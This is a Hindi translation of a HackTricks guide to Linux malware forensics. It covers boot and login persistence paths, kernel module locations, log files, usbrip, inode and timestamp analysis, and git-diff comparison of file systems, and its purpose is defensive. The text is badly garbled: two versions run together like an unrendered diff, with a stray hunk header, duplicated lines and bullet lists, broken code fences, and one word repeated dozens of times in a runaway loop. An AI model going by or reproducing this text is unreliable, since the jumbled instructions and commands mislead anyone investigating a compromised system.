मैलवेयर के लिए एक नए, अनधिकृत सेवा के रूप में अपने आप को अंकुरित करना बहुत सामान्य है। लिनक्स में कई स्क्रिप्ट हैं जो कंप्यूटर बूट होते समय सेवाएं शुरू करने के लिए उपयोग किए जाते हैं। प्रारंभी स्टार्टअप स्क्रिप्ट _**/etc/inittab**_ अन्य स्क्रिप्टों को बुलाता है जैसे rc.sysinit और _**/etc/rc.d/**_ निर्देशिका के तहत विभिन्न स्टार्टअप स्क्रिप्ट, या कुछ पुराने संस्करणों में _**/etc/rc.boot/**_। अन्य लिनक्स संस्करणों पर, जैसे डेबियन, स्टार्टअप स्क्रिप्ट _**/etc/init.d/**_ निर्देशिका में संग्रहीत होते हैं। साथ ही, कुछ सामान्य सेवाएं _**/etc/inetd.conf**_ या _**/etc/xinetd/**_ में सक्षम की जाती हैं लिनक्स के संस्करण के आधार पर। डिजिटल जांचकर्ताओं को इन स्टार्टअप स्क्रिप्ट की हर अनूठी प्रविष्टियों की जांच करनी चाहिए। मालवेयर को सेवा के रूप में स्थापित किया जा सकता है इन पथों पर:
- **/etc/inittab**: rc.sysinit जैसे प्रारंभीकरण स्क्रिप्ट को बुलाता है, जो आगे स्टार्टअप स्क्रिप्ट्स की ओर निर्देशित करता है।
- **/etc/rc.d/** और **/etc/rc.boot/**: सेवा स्टार्टअप के लिए स्क्रिप्ट्स को रखता है, जिसमें पुराने Linux संस्करणों में दूसरा मिलता है।
- **/etc/init.d/**: Debian जैसे कुछ Linux संस्करणों में स्टार्टअप स्क्रिप्ट्स को स्टोर करने के लिए उपयोग किया जाता है।
- सेवाएं **/etc/inetd.conf** या **/etc/xinetd/** के माध्यम से भी सक्रिय की जा सकती है, जो Linux प्रकार पर निर्भर करता है।
- **/etc/systemd/system**: सिस्टम और सेवा प्रबंधक स्क्रिप्टों के लिए एक निर्देशिका।
- **/etc/systemd/system/multi-user.target.wants/**: मल्टी-यूजर रनलेवल में शुरू किए जाने चाहिए सेवाओं के लिंक्स को रखता है।
- **/usr/local/etc/rc.d/**: कस्टम या थर्ड-पार्टी सेवाओं के लिए।
- **~/.config/autostart/**: उपयोगकर्ता-विशिष्ट स्वचालित स्टार्टअप एप्लिकेशन के लिए, जो उपयोगकर्ता-लक्षित मालवेयर के लिए एक छिपने की जगह हो सकता है।
- **/lib/systemd/system/**: सिस्टम-वाइड डिफ़ॉल्ट यूनिट फ़ाइलें इंस्टॉल किए गए पैकेज्स द्वारा प्रदान की जाती हैं।
* _**/etc/inittab**_
* _**/etc/rc.d/**_
* _**/etc/rc.boot/**_
* _**/etc/init.d/**_
* _**/etc/inetd.conf**_
* _**/etc/xinetd/**_
* _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_
### कर्नेल मॉड्यूल ### कर्नेल मॉड्यूल
लिनक्स सिस्टम पर, कर्नेल मॉड्यूल मैलवेयर पैकेज के लिए रूटकिट घटक के रूप में आमतौर पर उपयोग किए जाते हैं। कर्नेल मॉड्यूल सिस्टम बूट होने पर `/lib/modules/'uname -r'` और `/etc/modprobe.d` निर्देशिकाओं में कॉन्फ़िगरेशन सूचना के आधार पर लोड होते हैं, और `/etc/modprobe` या `/etc/modprobe.conf` फ़ाइल। इन क्षेत्रों की जांच करनी चाहिए जो मैलवेयर से संबंधित हैं। लिनक्स कर्नेल मॉड्यूल, जो अक्सर मालवेयर द्वारा रूटकिट घटक के रूप में उपयोग किए जाते हैं, सिस्टम बूट पर लोड होते हैं। इन मॉड्यूल के लिए महत्वपूर्ण निर्देशिकाएं और फ़ाइलें शामिल हैं:
### अन्य ऑटोस्टार्ट स्थान - **/lib/modules/$(uname -r)**: चल रहे कर्नेल संस्करण के लिए मॉड्यूल्स को रखता है।
- **/etc/modprobe.d**: मॉड्यूल लोडिंग को नियंत्रित करने के लिए कॉन्फ़िगरेशन फ़ाइलें शामिल हैं।
- **/etc/modprobe** और **/etc/modprobe.conf**: वैश्विक मॉड्यूल सेटिंग्स के लिए फ़ाइलें।
लिनक्स कई विन्यास फ़ाइलों का उपयोग करता है जो स्वचालित रूप से एक कार्यक्षमता को लॉग इन करने पर लॉन्च करने के लिए हो सकती हैं जो मैलवेयर के अनुकरण को शामिल कर सकती हैं। ### अन्य स्वचालित स्थान
* _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ जब कोई भी उपयोगकर्ता खाता लॉग इन करता है तो इन्हें निष्पादित किया जाता है। लिनक्स उपयोगकर्ता लॉगिन पर स्वचालित रूप से कार्यों को निष्पादित करने के लिए विभिन्न फ़ाइलें उपयोग करता है, जो संभावित रूप से मालवेयर को छुपाने के लिए हो सकते हैं:
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ जब विशिष्ट उपयोगकर्ता लॉग इन करता है तो इन्हें निष्पादित किया जाता है।
* _**/etc/rc.local**_ इसे पारंपरिक रूप से उन सभी साधारण सिस्टम सेवाओं के बाद निष्पादित किया जाता है, प्रोसेस के अंत में एक मल्टीयूजर रनलेवल में स्विच करने की प्रक्रिया के बाद। - **/etc/profile.d/***, **/etc/profile**, और **/etc/bash.bashrc**: किसी भी उपयोगकर्ता लॉगिन के लिए निष्पादित किया जाता है।
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, और **~/.config/autostart**: उपयोगकर्ता-विशिष्ट फ़ाइलें जो उनके लॉगिन पर चलती हैं।
- **/etc/rc.local**: सभी सिस्टम सेवाएं शुरू होने के बाद चलता है, जो मल्टीयूजर परिवेश में स्थानांतरण के अंत को चिह्नित करता है।
## लॉग की जांच ## लॉग की जांच
कंप्रोमाइज़ सिस्टम पर उपलब्ध सभी लॉग फ़ाइलों में दुर्भाग्यपूर्ण निष्पादन और संबंधित गतिविधियों के लिए खोजें जैसे कि एक नई सेवा का निर्माण। लिनक्स सिस्टम विभिन्न लॉग फ़ाइलों के माध्यम से उपयोगकर्ता गतिविधियों और सिस्टम घटनाओं का ट्रैक करता है। ये लॉग अनधिकृत पहुंच, मालवेयर संक्रमण, और अन्य सुरक्षा घटनाओं की पहचान के लिए महत्वपूर्ण हैं। मुख्य लॉग फ़ाइलें शामिल हैं:
### शुद्ध लॉग - **/var/log/syslog** (Debian) या **/var/log/messages** (RedHat): सिस्टम-व्यापी संदेश और गतिविधियों को कैप्चर करते हैं।
- **/var/log/auth.log** (Debian) या **/var/log/secure** (RedHat): प्रमाणीकरण प्रयासों, सफल और असफल लॉगिन को रिकॉर्ड करते हैं।
- `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` का उपयोग संबंधित प्रमाणीकरण घटनाओं को फ़िल्टर करने के लिए करें।
- **/var/log/boot.log**: सिस्टम स्टार्टअप संदेशों को शामिल करता है।
- **/var/log/maillog** या **/var/log/mail.log**: ईमेल सर्वर गतिविधियों को लॉग करता है, जो ईमेल संबंधित सेवाओं का ट्रैकिंग करने के लिए उपयोगी है।
- **/var/log/kern.log**: कर्नेल संदेशों को स्टोर करता है, जिसमें त्रुटियाँ और चेतावनियाँ शामिल हैं।
- **/var/log/dmesg**: डिवाइस ड्राइवर संदेशों को रखता है।
- **/var/log/faillog**: असफल लॉगिन प्रयासों को रिकॉर्ड करता है, सुरक्षा उल्लंघन जांच में मदद करता है।
- **/var/log/cron**: क्रॉन जॉब क्रियाएँ लॉग करता है।
- **/var/log/daemon.log**: पिछले सेवा गतिविधियों का ट्रैक करता है।
- **/var/log/btmp**: असफल लॉगिन प्रयासों को दस्तावेज़ करता है।
- **/var/log/httpd/**: Apache HTTPD त्रुटि और एक्सेस लॉग्स को शामिल करता है।
- **/var/log/mysqld.log** या **/var/log/mysql.log**: MySQL डेटाबेस गतिविधियों को लॉग करता है।
- **/var/log/xferlog**: FTP फ़ाइल स्थानांतरण को रिकॉर्ड करता है।
- **/var/log/**: यहाँ अप्रत्याशित लॉग के लिए हमेशा जांच करें।
सिस्टम और सुरक्षा लॉग में दर्ज किए गए **लॉगिन** घटनाएं, जिसमें नेटवर्क के माध्यम से लॉगिन, एक निश्चित समय पर किसी खाते के माध्यम से **मैलवेयर** या एक **अतिक्रमणकारी ने पहुंच** प्राप्त किया हो सकता है। एक मैलवेयर संक्रमण के समय के आसपास अन्य घटनाएं सिस्टम लॉग में कैप्चर की जा सकती हैं, जैसे कि एक **नई** **सेवा** का **निर्माण** या घटना के समय नए खातों का निर्माण।\ {% hint style="info" %}
रोचक सिस्टम लॉगिन: लिनक्स सिस्टम लॉग और ऑडिट सबसिस्टम को एक उत्पीड़न या मालवेयर घटना में अक्षम या हटा दिया जा सकता है। क्योंकि लिनक्स सिस्टम पर लॉग आम तौर पर दुष्ट गतिविधियों के बारे में सबसे उपयोगी जानकारी को समाहित करते हैं, अत्याधिकारियों नियमित रूप से उन्हें हटा देते हैं। इसलिए, उपलब्ध लॉग फ़ाइलों की जांच करते समय, यह महत्वपूर्ण है कि हटाने या छेदखद्द करने के संकेत के रूप में गैप्स या अव्यवस्थित प्रविष्टियों की खोज की जाए।
{% endhint %}
* **/var/log/syslog** (debian) या **/var/log/messages** (Redhat) **लिनक्स प्रत्येक उपयोगकर्ता के लिए एक कमांड हिस्ट्री बनाए रखता है**, जिसे इसमें स्टोर किया जाता है:
* सिस्टम के बारे में सामान्य संदेश और जानकारी दिखाता है। यह वैश्विक सिस्टम के द्वारा किए गए सभी गतिविधियों का डेटा लॉग है।
* **/var/log/auth.log** (debian) या **/var/log/secure** (Redhat)
* सफल या असफल लॉगिन, और प्रमाणीकरण प्रक्रियाओं के लिए प्रमाणीकरण लॉग रखता है। संग्रहण सिस्टम प्रकार पर निर्भर करता है।
* `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
* **/var/log/boot.log**: स्टार्टअप संदेश और बूट जानकारी।
* **/var/log/maillog** या **var/log/mail.log:** मेल सर्वर लॉग के लिए है, पोस्टफिक्स, smtpd, या आपके सर्वर पर चल रही ईमेल संबंधित सेवाओं की जानकारी के लिए उपयुक्त है।
* **/var/log/kern.log**: कर्नेल लॉग और चेतावनी जानकारी रखता है। कर्नेल गतिविधि लॉग (जैसे, dmesg, kern.log, klog) दिखा सकते हैं कि किसी विशेष सेवा का बार-बार क्रैश हो रहा है, जिससे संकेत मिल सकता है कि एक अस्थिर ट्रोजनाइज़ वर्जन स्थापित किया गया है।
* **/var/log/dmesg**: डिवाइस ड्राइवर संदेशों के लिए एक भंडारण स्थान। इस फ़ाइल में संदेश देखने के लिए **dmesg** का उपयोग करें।
* **/var/log/faillog:** असफल लॉगिन के बारे में जानकारी रिकॉर्ड करता है। इसलिए, लॉगिन क्रेडेंशियल हैक्स और ब्रूट-फोर्स हमलों जैसे संभावित सुरक्षा उल्लंघनों की जांच के लिए उपयोगी है।
* **/var/log/cron**: Crond संबंधित संदेशों (क्रॉन जॉब्स) का रिकॉर्ड रखता है। जैसे जब क्रॉन डेमन ने एक नौकरी शुरू की।
* **/var/log/daemon.log:** चल रहे पृष्ठ सेवाओं का ट्रैक रखता है लेकिन उन्हें ग्राफिकल रूप में प्रस्तुत नहीं करता है।
* **/var/log/btmp**: सभी असफल लॉगिन प्रयासों का एक नोट रखता है।
* **/var/log/httpd/**: Apache httpd डेमन के error\_log और access\_log फ़ाइलों को रखने वाला एक निर्देशिका। httpd कोई भी त्रुटि जो आती है, उसे **error\_log** फ़ाइल में रखा जाता है। सिस्टम से संबंधित त्रुटियों की तरह। **access\_log** HTTP के माध्यम से आने वाले सभी अनुरोधों का लॉग रखता है।
* **/var/log/mysqld.log** या **/var/log/mysql.log**: MySQL लॉग फ़ाइल जो हर debug, विफलता और सफलता संदेश को रिकॉर्ड करती है, जिसमें MySQL डेमन mysqld की शुरुआत, बंद करना और पुनरारंभ करना शामिल है। सिस्टम निर्धारित करता है। RedHat, CentOS, Fedora, और अन्य RedHat-आधारित सिस्टम /var/log/mariadb/mariadb.log का उपयोग करते हैं। हालांकि, Debian/Ubuntu /var/log/mysql/error.log निर्देशिका का उपयोग करते हैं।
* **/var/log/xferlog**: FTP फ़ाइल स्थानांतरण सत्रों को रखता है। फ़ाइल नामों और उपयोगकर्ता प्रेरित FTP स्थानांतरण जैसी जानकारी शामिल है।
* **/var/log/\*** : इस निर्देशिका में अप्रत्याशित लॉग के लिए हमेशा जांच करना चाहिए
{% hint style="info" - ~/.bash_history
``` - ~/.zsh_history
- ~/.zsh_sessions/*
- ~/.python_history
- ~/.*_history
इसके अतिरिक्त, `last -Faiwx` कमांड एक उपयोगकर्ता लॉगिन की सूची प्रदान करता है। अज्ञात या अप्रत्याशित लॉगिन के लिए इसे जांचें।
अतिरिक्त अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिक
```bash
pip3 install usbrip pip3 install usbrip
usbrip ids download #Download USB ID database usbrip ids download #Download USB ID database
``` ```
### उदाहरण ### उदाहरण
``` ```bash
usbrip events history #Get USB history of your curent linux machine usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
#Search for vid and/or pid #Search for vid and/or pid
@ -303,91 +314,85 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
``` ```
अधिक उदाहरण और जानकारी गिटहब में: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) अधिक उदाहरण और जानकारी गिटहब में: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और **ऑटोमेट वर्कफ़्लो** बनाने के लिए दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित करें।\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और **दुनिया के सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **कार्यप्रवाहों** को आसानी से निर्माण और स्वचालित करें।\
आज ही पहुंचें: आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## उपयोगकर्ता खातों और लॉगऑन गतिविधियों की समीक्षा ## उपयोगकर्ता खातों और लॉगऑन गतिविधियों की समीक्षा
अनूठे नामों या खातों की जांच करें जो अनुमतित घटनाओं के निकट बनाए गए या उपयोग किए गए हों।\ असामान्य नामों या खातों की जांच करें जो _**/etc/passwd**_, _**/etc/shadow**_ और **सुरक्षा लॉग** में निर्मित और/या उपयोग किए गए हों जो ज्ञात अनधिकृत घटनाओं के करीब बनाए गए हों। साथ ही, संभावित सुडो ब्रूट-फोर्स हमलों की जांच करें।\
असामान्य नामों या खातों की जांच करें जो अनुमतित घटनाओं के निकट बनाए गए या उपयोग किए गए हों।\ इसके अतिरिक्त, _**/etc/sudoers**_ और _**/etc/groups**_ जैसी फ़ाइलों की जांच करें जिसमें उपयोगकर्ताओं को अप्रत्याशित विशेषाधिकार दिए गए हों।\
सुदूर विशेषाधिकारों की जांच करें जो उपयोगकर्ताओं को दी गई हों।\ अंततः, **कोई पासवर्ड नहीं** या **आसानी से अनुमान लगाए जाने वाले** पासवर्ड वाले खातों की जांच करें।
किसी भी खातों की खोज करें जिनमें **कोई पासवर्ड नहीं** है या **आसानी से अनुमान लगाया जा सकने वाला पासवर्ड** है।
## फ़ाइल सिस्टम की जांच ## फ़ाइल सिस्टम की जांच
फ़ाइल सिस्टम डेटा संरचनाएँ एक **मैलवेयर** घटना से संबंधित बहुत सारी **जानकारी** प्रदान कर सकती हैं, जैसे **घटनाओं का समय** और **मैलवेयर** की वास्तविक **सामग्री**।\ ### मैलवेयर जांच में फ़ाइल सिस्टम संरचनाओं का विश्लेषण
**मैलवेयर** को **फ़ाइल सिस्टम विश्लेषण** को अवरोधित करने के लिए बढ़ाया जा रहा है। कुछ मैलवेयर दुर्भाग्यपूर्ण फ़ाइलों पर दिनांक-समय छापों को बदलते हैं ताकि उन्हें टाइमलाइन विश्लेषण के साथ खोजना कठिन हो। अन्य दुर्भाग्यपूर्ण कोड डेटा को केवल फ़ाइल सिस्टम में रखने के लिए डिज़ाइन किए गए हैं।\
इस प्रकार के एंटी-फोरेंसिक तकनीकों का सामना करने के लिए, फ़ाइल सिस्टम दिनांक-समय छापों के टाइमलाइन विश्लेषण और मैलवेयर के सामान्य स्थानों में संभावित फ़ाइलों की जांच करना आवश्यक है।
* **ऑटॉप्सी** का उपयोग करके आप संदेहास्पद गतिविधि खोजने के लिए घटनाओं का टाइमलाइन देख सकते हैं। आप **Sleuth Kit** से `mactime` विशेषता का सीधा उपयोग भी कर सकते हैं। मैलवेयर घटनाओं की जांच करते समय, फ़ाइल सिस्टम की संरचना एक महत्वपूर्ण सूत्र होती है, जो घटनाओं की क्रमवार्ता और मैलवेयर की सामग्री दोनों की जानकारी प्रकट करती है। हालांकि, मैलवेयर लेखक इस विश्लेषण को बाधित करने के लिए तकनीक विकसित कर रहे हैं, जैसे फ़ाइल टाइमस्टैम्प को संशोधित करना या डेटा भंडारण के लिए फ़ाइल सिस्टम से बचना।
* **$PATH** में **अप्रत्याशित स्क्रिप्ट** की जांच करें (शायद कुछ sh या php स्क्रिप्ट?)
* `/dev` में फ़ाइलें विशेष फ़ाइलें थीं, आप यहाँ मैलवेयर से संबंधित गैर-विशेष फ़ाइलें पा सकते हैं।
* असामान्य या **छिपी हुई फ़ाइलें** और **निर्देशिकाएँ** खोजें, जैसे “.. ” (डॉट डॉट स्पेस) या “..^G ” (डॉट डॉट कंट्रोल-जी)
* सिस्टम पर /bin/bash की setuid प्रतियां `find / -user root -perm -04000 print`
* बड़ी संख्या में फ़ाइलों के हटाए जाने के लिए हटाए गए **इनोड की दिनांक-समय छापों** की समीक्षा करें, जो एक ही समय पर होने वाली दुर्भाग्यपूर्ण गतिविधि जैसे रूटकिट या ट्रोजनाइज़ सेवा की स्थापना का संकेत दे सकती है।
* क्योंकि इनोड अगली उपलब्धता के आधार पर आवंटित किए जाते हैं, **सिस्टम पर डाली गई दुर्भाग्यपूर्ण फ़ाइलें लगभग एक ही समय पर स्थापित की जा सकती हैं**। इसलिए, जब मैलवेयर का एक घटक पाया जाता है, तो पड़ोसी इनोड की जांच करना उपयोगी हो सकता है।
* नए या संशोधित फ़ाइलों की **संशोधित और या बदली गई समय** की दिनांक-समय छापों की समीक्षा करें जैसे _/bin_ या _/sbin_ जैसे निर्देशिकाओं की।
* एक निर्देशिका की फ़ाइलों और फ़ोल्डर को देखना **निर्माण तिथि** के आधार पर वर्णित होता है बजाय वर्णानुक्रमिक रूप से देखना दिखाई देता है कि कौन सी फ़ाइलें या फ़ोल्डर अधिक हाल की हैं (अंतिम वाले सामान्यतः)।
आप `ls -laR --sort=time /bin` का उपयोग करके एक फ़ोल्डर की सबसे हाल की फ़ाइलें देख सकते हैं।\ इन एंटी-फोरेंसिक विधियों का विरोध करने के लिए, निम्नलिखित महत्वपूर्ण है:
आप `ls -lai /bin |sort -n` का उपयोग करके एक फ़ोल्डर में फ़ाइलों के इनोड देख सकते हैं।
- **घटना समयरेखा विश्लेषण** का विस्तृत कार्यक्रम उपयोग करके करें, जैसे कि **Autopsy** जैसे उपकरणों का उपयोग करके घटना समयरेखाओं को दृश्यात्मक बनाने के लिए या **Sleuth Kit's** `mactime` का उपयोग विस्तृत समयरेखा डेटा के लिए।
- तंत्रिका द्वारा उपयोग किए गए अप्रत्याशित स्क्रिप्टों की जांच करें, जो आक्रमणकारियों द्वारा उपयोग किए जा सकते हैं, जैसे कि शैल या PHP स्क्रिप्ट।
- **अटिपिकल फ़ाइलों** के लिए `/dev` की जांच करें, क्योंकि यह पारंपरिक रूप से विशेष फ़ाइलों को समेत रखता है, लेकिन मैलवेयर संबंधित फ़ाइलों को भी रख सकता है।
- ".. " (डॉट डॉट स्पेस) या "..^G" (डॉट डॉट कंट्रोल-जी) जैसे नामों वाली **छिपी हुई फ़ाइलों या निर्देशिकाओं** की खोज करें, जो कट्टर सामग्री को छुपा सकती हैं।
- उच्च अनुमतियों वाली रूट फ़ाइलों की पहचान करें इस आदेश का उपयोग करके:
```find / -user root -perm -04000 -print```
यह उच्च अनुमतियों वाली फ़ाइलों को खोजता है, जिन्हें आक्रमणकारियों द्वारा दुरुपयोग किया जा सकता है।
- इनोड तालिकाओं में **मिटाने की समयचिह्न** की समीक्षा करें, ताकि रूटकिट या ट्रोजन की मौजूदगी की संकेतिकता को पहचान सकें।
- एक के बाद एक आने वाले इनोड की जांच करें, एक बार एक को पहचानने के बाद उनके पास मैलवेयर संबंधित फ़ाइलें हो सकती हैं।
- हाल ही में संशोधित फ़ाइलों के लिए सामान्य बाइनरी निर्देशिकाओं (_/bin_, _/sbin_) की जांच करें, क्योंकि इन्हें मैलवेयर द्वारा संशोधित किया जा सकता है।
```bash
# List recent files in a directory:
ls -laR --sort=time /bin```
# Sort files in a directory by inode:
ls -lai /bin | sort -n```
```
{% hint style="info" %} {% hint style="info" %}
ध्यान दें कि एक **हमलावर** **फ़ाइलें दिखाने** के लिए **समय** को **संशोधित** कर सकता है, लेकिन वह **इनोड** को **संशोधित** नहीं कर सकता। यदि आपको लगता है कि एक **फ़ाइल** का **इनोड समय** के रूप में बनाया गया है और उसका **इनोड अप्रत्याशित रूप से बड़ा** है, तो उस **फ़ाइल के टाइमस्टैम्प संशोधित किए गए** हो सकते हैं। ध्यान दें कि एक **हमलावर** समय को **संशोधित** कर सकता है ताकि **फ़ाइलें वैध** लगें, लेकिन वह **inode** को **संशोधित** नहीं कर सकता। अगर आपको लगता है कि एक **फ़ाइल** इस बात का संकेत देती है कि यह उसी समय बनाई और संशोधित की गई थी जैसे कि उसी फ़ोल्डर में अन्य फ़ाइलें, लेकिन **inode** अपेक्षाकृत बड़ा है, तो उस **फ़ाइल के timestamps को संशोधित किया गया था**
{% endhint %} {% endhint %}
## विभिन्न फ़ाइल सिस्टम संस्करणों की फ़ाइलों की तुलना करें ## विभिन्न फ़ाइल सिस्टम संस्करणों की तुलना करें
#### जोड़ी गई फ़ाइलें ### फ़ाइल सिस्टम संस्करण तुलना सारांश
फ़ाइल सिस्टम संस्करणों की तुलना करने और परिवर्तनों को पहचानने के लिए, हम सरलित `git diff` कमांड का उपयोग करते हैं:
- **नई फ़ाइलें खोजने** के लिए, दो निर्देशिकाओं की तुलना करें:
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
``` ```
#### संशोधित सामग्री खोजें - **संशोधित सामग्री के लिए**, विशिष्ट पंक्तियों को नजरअंदाज करते हुए परिवर्तनों की सूची बनाएं:
```bash ```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
``` ```
#### हटाए गए फ़ाइलें खोजें - **हटाए गए फ़ाइलों का पता लगाने के लिए**:
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
``` ```
#### अन्य फ़िल्टर - **फ़िल्टर विकल्प** (`--diff-filter`) मदद करते हैं किसी विशेष परिवर्तन जैसे जोड़ी गई (`A`), हटाई गई (`D`), या संशोधित (`M`) फ़ाइलों तक पहुंचने में।
- `A`: जोड़ी गई फ़ाइलें
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** - `C`: कॉपी की गई फ़ाइलें
- `D`: हटाई गई फ़ाइलें
केवल फ़ाइलों को चुनें जिन्हें जोड़ा गया (`A`), कॉपी किया गया (`C`), हटाया गया (`D`), संशोधित किया गया (`M`), नाम बदला गया (`R`), और उनके प्रकार (जैसे सामान्य फ़ाइल, सिंकलिंक, सबमॉड्यूल, …​) बदल गया (`T`), अमर्जित (`U`), अज्ञात (`X`), या उनके संयोजन टूट गया (`B`). फ़िल्टर वर्णों का कोई भी संयोजन (सहित किसी भी नहीं) उपयोग किया जा सकता है. जब `*` (सभी या कोई नहीं) संयोजन में जोड़ा जाता है, तो तुलना में किसी अन्य मानदंड को मिलने पर सभी पथ चयनित होते हैं; अगर कोई ऐसी फ़ाइल नहीं है जो अन्य मानदंड को मिलती है, तो कुछ भी चयनित नहीं होता है। - `M`: संशोधित फ़ाइलें
- `R`: नामकरण की गई फ़ाइलें
इसके अलावा, **ये ऊपरी मामले छोटे अक्षर में बदले जा सकते हैं**। उदाहरण के लिए, `--diff-filter=ad` जोड़े और हटाए गए पथों को निकालता है। - `T`: प्रकार के परिवर्तन (उदा।, फ़ाइल से सिंबलिंक)
- `U`: असंघटित फ़ाइलें
ध्यान दें कि सभी विभेदों में सभी प्रकार शामिल नहीं हो सकते। उदाहरण के लिए, सूची से काम के पेड़ से वर्किंग ट्री की तुलना में विभेद कभी भी जोड़े गए प्रविष्टियों को नहीं रख सकते (क्योंकि विभेद में शामिल पथों का सेट सूची में क्या है उससे सीमित होता है)। उसी तरह, कॉपी और नाम बदले गए प्रविष्टियाँ उस समय प्रकट नहीं हो सकतीं जब उन प्रकारों के लिए पहचान अक्षम हो। - `X`: अज्ञात फ़ाइलें
- `B`: टूटी हुई फ़ाइलें
## संदर्भ ## संदर्भ
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
* [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
<details> * **पुस्तक: मैलवेयर फोरेंसिक्स फ़ील्ड गाइड फॉर लिनक्स सिस्टम्स: डिजिटल फोरेंसिक्स फ़ील्ड गाइड्स**
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* अपने [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन की
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
**अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **वर्ल्ड के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित** वर्कफ़्लो बनाएं और स्वचालित करें।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

View file

